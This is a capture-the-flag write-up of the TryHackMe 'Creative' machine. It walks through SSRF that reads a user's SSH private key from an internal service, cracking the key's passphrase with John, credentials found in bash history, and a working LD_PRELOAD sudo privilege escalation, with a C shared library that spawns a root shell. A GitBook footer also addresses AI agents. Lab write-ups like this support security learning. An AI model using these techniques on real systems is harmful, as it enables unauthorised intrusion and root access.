> For the complete documentation index, see [llms.txt](https://bunring.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://bunring.gitbook.io/ctf-writeups/try-hack-me/2024/creative.md). # Creative {% embed url="" %} ## Recon Let's start with a nmap scan. The Nmap scan results show only two open ports: port `22`, which is running `SSH`, and port `80`, hosting a web server with `nginx version 1.18.0`. {% code overflow="wrap" %} ```bash ┌──(kali㉿kali)-[~] └─$ nmap -p- -T4 creative.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:48 BST Host is up (0.17s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 430.03 seconds ┌──(kali㉿kali)-[~] └─$ nmap -p 22,80 -sC -sV -T4 creative.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 11:56 BST Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 11:56 (0:00:06 remaining) Nmap scan report for creative.thm (10.10.127.96) Host is up (0.18s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA) | 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA) |_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Creative Studio | Free Bootstrap 4.3.x template |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds ``` {% endcode %} Visting the site, it seems to be a webpage for a UI/UX, Web Development and App Design services.

Ferox buster didn't reveal any directories worth looking at.\ Subdomain enumeration revealed a subdomain `beta.creative.thm`.

After adding it to /etc/hosts we can visit this site.\ We encounter a beta URL tester that checks if a provided URL is live or dead. If the URL is live, we get redirected to the corresponding page. This setup appears to be vulnerable to Server-Side Request Forgery (SSRF) exploitation.

We can utilize `Ffuf` for port scanning by generating a port list using the `seq` command. After a short duration, we identify port `1337`. The scan pauses briefly on port `5000`, likely due to the presence of `beta.creative.thm` internally, causing a recursive call delay. However, the scan resumes shortly afterward.

Requesting the endpoint on `1337:` ``` http://127.0.0.1:1337/ ```

We make a request to the home directory and find a directory called `saad`. Which has `user.txt`.

## Initial Access We can also find the private SSH key of `saad` in the `.ssh` folder. ``` http://127.0.0.1:1337/home/saad/.ssh/id_rsa ```

After saving the key and adjusting permissions accordingly, we attempt to log in via SSH as Saad. However, we encounter a prompt requesting a passphrase for the SSH key.

We feed the SSH key into `ssh2john` to produce a hash that can be cracked using John the Ripper.\ Next, we crack the hash using `John` with `rockyou.txt`, and get the passphrase for the key. ```bash ┌──(kali㉿kali)-[~/Desktop/THM/creative] └─$ ssh2john id_rsa > id_rsa.hash ┌──(kali㉿kali)-[~/Desktop/THM/creative] └─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt ```

With the passphrase obtained, we successfully log in and gain access as the user `Saad`. In the user's home directory, we locate the first flag, which was previously accessible via the `beta.creative.thm` website.

## Privilege Escalation `sudo -l` asks for a password, however while enumerating the user's home directory, we discover a `.bash_history` file containing valuable content. This file holds the credentials for the user `Saad`.

With the obtained credentials, we successfully query `sudo -l`. We find that we have permission to run `/usr/bin/ping` with sudo privileges. However, this alone does not provide a straightforward path for privilege escalation. Fortunately for us, there's another option available: `env_keep+=LD_PRELOAD`. `LD_PRELOAD` is an environment variable commonly used on Unix-like systems to preload shared libraries before others when a program is executed. This enables overriding functions in other shared libraries. If an attacker can manipulate `LD_PRELOAD` to reference a malicious shared library, and if this environment variable is preserved when running commands with sudo, it presents an avenue for executing arbitrary code with elevated privileges. We make use of a provided resource containing a previously mentioned shared library written in C. This library incorporates a function designed to elevate privileges to root by setting the user and group IDs to zero and spawning a shell. This effectively grants root shell access to the user. {% embed url="" %} {% code title="shell.c" lineNumbers="true" %} ```c #include #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/sh"); } ``` {% endcode %} We compile the `C` code into a shared library. ```bash gcc -fPIC -shared -o shell.so shell.c -nostartfiles ls -al shell.so ``` Next, we execute the ping command with sudo privileges while setting `LD_PRELOAD` to the previously crafted shared library. This allows us to obtain a root shell, granting us access to extract the root flag located at `/root`. ```bash sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/2024/creative.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.